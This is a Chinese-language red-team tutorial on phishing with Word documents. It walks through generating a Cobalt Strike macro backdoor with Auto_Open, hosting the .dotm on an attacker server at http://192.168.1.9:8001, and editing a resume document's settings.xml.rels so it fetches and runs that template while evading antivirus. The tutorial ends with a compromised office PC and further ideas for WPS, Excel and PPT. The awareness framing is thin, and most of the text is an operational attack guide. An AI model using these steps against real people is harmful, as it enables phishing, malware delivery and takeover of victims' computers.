渗透钓鱼篇-Word文档注入执行恶意宏

0x01 前言

网络钓鱼是社会工程学攻击方式之一，主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段！

网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息，黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。

网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是，如果他们要保护自己的信息，所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。

这篇主要演示如何创建Word文档进行钓鱼，并控制对方，该方法也是红队常用的钓鱼方式之一，利用的是分离免杀！最后还会写一点思路！

0x02 环境介绍

黑客（攻击者）：

IP：192.168.1.9

系统：kali.2020.4

VPS服务器：

目前演示是用kali来架设做VPS公网服务器的！道理意义一样！

办公电脑：

系统：windwos10

IP：192.168.1.208

目前kali上运行了Cobalt strike ，攻击者在自己的公网VPS服务器上制作了后门word文档，并上传上去作为钓鱼用，办公电脑收到对方邮件或者各种手段发送的word后门文档，最终黑客控制办公电脑的过程！！

0x03 Word文档注入后门宏演示

1、创建基础文档
在桌面基础创建文档名称：dayu.docx

图片

2、开发工具
大部分办公都不需要开发环境工具，所以在word文档栏目中是没有开发工具这项栏目的，需要在这里打开即可！！
图片
图片

3、CS创建office后门
这里CS在前面已经讲得很详细了，不懂的往前看看文章！Attacks-MS office Macro进入！
图片

选择监听！点击Generate！
图片

生成宏后门，点击复制！
图片

4、插入后门代码
点击开发工具后，双击打开ThisDocument后出现编辑框！将刚复制好的CS后门代码复制进入！
图片

右上角选择Auto_Open，简单理解就是自动打开的意思！就是对方在打开word文档时，簿会自动运行宏提示信息，是否点击，点击就抓取到了shell！！
图片

Ctrl+S保存后，会提示，点击否即可！
图片

选择保存类型：*.dotm…（为什么选择dotm，往下看就晓得了~）
图片

保存后提示报毒了！！未做任何免杀的！！继续…
图片

目前桌面上有两个文件，一个宏，一个docx…（为了讲得更细致步骤就细化了）
图片

5、简单测试
这里简单测试，是测试CS生成的shell和本机是互联的，确保能拿到对方控制权限！

右键点打开！（必须右键点打开！）

图片

提示宏已禁用，点击启用内容！
图片

正常上线！说明没问题，那么接下来继续！！
图片

6、上传后门宏
将后门宏文件dayu.dotm上传到公网服务器中（这里用kali进行模拟）

图片

7、新建word文档
目前文档类型非常多，我已简历为主！这里创建一个简历模版保存到桌面即可！

图片

8、修改文件名
修改文件名：docx改为zip类型！！

图片

9、修改宏内容
将zip文件解压，进入/word/_rels目录下，打开settings.xml.rels宏文件，这段就是宏需要执行的代码…！

file:///C:UsersyujunAppDataRoamingMicrosoftTemplates精美简历，由%20MOO%20设计.dotx
图片

将该段代码修改为以下内容，意思就是执行开启宏后，会执行访问下载服务器上的dotm宏文件并执行！！
http://192.168.1.9:8001/dayu.dotm
图片

然后将内容重新压缩后，在修改zip为docx类型，修改后可看到就是我的简历了！

图片

这里利用的是分离免杀的方法，里面的代码都是正常的，由于杀毒软件是静态查杀，所以无法查杀的！

10、下载并执行
可看到通过下载该简历文件，微软、360、火绒都是不查杀的！

图片

出于好奇心，打开文档，提示：
该工程中的宏被禁止，请...........是否激活...
那么安全意识强的肯定是点X，安全意识差的，点确定，都没关系！钓鱼嘛，主要钓鱼安全意识差，又不懂安全的人，社会太多太多了~~所以要加强安全意识啊！

这里点击确定或者关闭点X关掉该框框，都意义不大，主要的意思是提醒用户，左上角可以启用内容！！！使用宏！！！正常浏览简历！！！

那么左上角还有个安全警告，点击启用内容！！

11、成功控制
可看到成功获得办公电脑192.168.1.208的控制权限！！

图片
图片

0x04 另外思路

如果是遇到WPS的客户怎么办？通过上面的方法WPS打开我的简历是不会提示宏的！我这只提供思路，因为现在群体用WPS非常的多，就不会写出来了！

另外思路：

1. 打开WPS创建宏是暗色的需要安装VBA for WPS才可以写WPS宏病毒代码执行！
2. Office和WPS中还可以隐藏文字，可以利用该方式通过配合录制宏的方法，用该方式执行…
3. Normal模块下，不止能编写一个settings.xml.rels…可以多宏…
4. 弹框执行代码写入宏，那么Excel、PPT等也写…
5. 不止docx宏，还有很多，能另存文件内容的都可以…

还有前面也提了混淆，就到这里，不在往下说了…提高安全意识吧~~

今天基础牢固就到这里，虽然基础，但是必须牢记于心。